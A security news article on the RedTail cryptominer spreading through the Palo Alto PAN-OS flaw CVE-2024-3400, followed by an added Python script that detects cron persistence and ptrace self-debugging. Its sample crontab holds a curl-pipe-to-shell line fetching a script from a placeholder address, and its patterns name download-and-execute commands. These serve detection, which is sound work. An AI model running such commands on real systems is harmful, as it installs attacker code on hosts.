Network Security, Endpoint/Device Security, Malware
New RedTail cryptominer attacks involve Palo Alto firewall exploit

(Credit: Rafael Henrique – stock.adobe.com)
Palo Alto Networks PAN-OS firewalls vulnerable to the flaw tracked as CVE-2024-3400 have been targeted by suspected Lazarus Group-linked threat actors to distribute an updated version of the RedTail cryptocurrency mining malware since late April, according to Security Boulevard.

Significant improvements have been made in the updated RedTail cryptominer, including an encrypted mining configuration and the attackers' use of private mining pools or pool proxies, which point to the sophistication of the new operation, a report from Akamai showed. Operators of the malware have also added self-process debugging and a cron job to better evade analysis and bolster persistence across system reboots, researchers noted.

"There are many glossy cryptominers out there, but seeing one with this level of polish is uncommon. The investments required to run a private cryptomining operation are significant, including staffing, infrastructure, and obfuscation. This sophistication may be indicative of a nation-state-sponsored attack group," added researchers.
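The two host-level behaviours the report calls out, cron-job persistence and a process that debugs itself to keep analysts from attaching, both leave traces a defender can check for. The script below is an added example written for this page, not code from Akamai, SC Media or the RedTail authors. It runs heuristic checks over constructed inputs (a sample root crontab and sample `/proc/<pid>/status` contents, with made-up PIDs, paths and a TEST-NET address) so it works offline; on a live Linux host you would feed it the real crontab text and the status files of running processes. The self-debugging check assumes the common fork-and-trace-the-parent pattern, where a child process ptrace-attaches to its parent; that is a heuristic, not a signature for this specific sample.

```python
"""Heuristic checks for two RedTail-style behaviours: cron-job persistence and a
process that is being debugged by its own child (ptrace-based anti-analysis).
Added example; all sample data below is constructed for illustration."""
import re

# Constructed sample crontab: one benign entry, two suspicious ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
@reboot /tmp/.x/miner -c /tmp/.x/cfg >/dev/null 2>&1
*/5 * * * * curl -s http://198.51.100.7/i.sh | sh
"""

# Constructed /proc/<pid>/status excerpts. PID 4243 is a child of 4242 and is
# tracing it, which is the self-debugging pattern; sshd is the benign control.
SAMPLE_STATUS = [
    "Name:\tsshd\nPid:\t812\nPPid:\t1\nTracerPid:\t0\n",
    "Name:\tminer\nPid:\t4242\nPPid:\t1\nTracerPid:\t4243\n",
    "Name:\tminer\nPid:\t4243\nPPid:\t4242\nTracerPid:\t0\n",
]

# Ordered so the first matching reason is reported for a line.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"), "runs from a world-writable directory"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "pipes a download into a shell"),
    (re.compile(r"^\s*@reboot\b"), "uses @reboot persistence"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes base64 at run time"),
]


def flag_cron_entries(crontab_text):
    """Return (line, reason) pairs for crontab lines that match a suspicious pattern."""
    findings = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments carry no command
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(stripped):
                findings.append((stripped, reason))
                break  # one reason per line is enough for triage
    return findings


def parse_status(status_text):
    """Pick the Name/Pid/PPid/TracerPid fields out of a /proc/<pid>/status file."""
    fields = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key in ("Name", "Pid", "PPid", "TracerPid"):
            fields[key] = value.strip()
    return fields


def find_self_debugging(status_blobs):
    """Return PIDs whose tracer is their own child process.

    A legitimate debugger is normally a separate tool started by an operator; a
    process whose tracer it spawned itself is the fork-and-ptrace-the-parent
    trick used to block analysts from attaching.
    """
    procs = {}
    for blob in status_blobs:
        fields = parse_status(blob)
        procs[int(fields["Pid"])] = fields
    hits = []
    for pid, fields in procs.items():
        tracer = int(fields.get("TracerPid", "0"))
        if tracer == 0 or tracer not in procs:
            continue  # not traced, or tracer not in the snapshot we were given
        if int(procs[tracer]["PPid"]) == pid:
            hits.append(pid)
    return hits


if __name__ == "__main__":
    for entry, reason in flag_cron_entries(SAMPLE_CRONTAB):
        print(f"[cron] {reason}: {entry}")
    for pid in find_self_debugging(SAMPLE_STATUS):
        print(f"[ptrace] pid {pid} is traced by its own child ({SAMPLE_STATUS and 'see status'})")
```

On a real host, `find_self_debugging` would be fed the contents of every `/proc/<pid>/status` so that the tracer's own entry is present; a hit is a reason to preserve the process (memory image, open files, cron entries) before killing it, since the miner's configuration is encrypted and may only be recoverable from the running process.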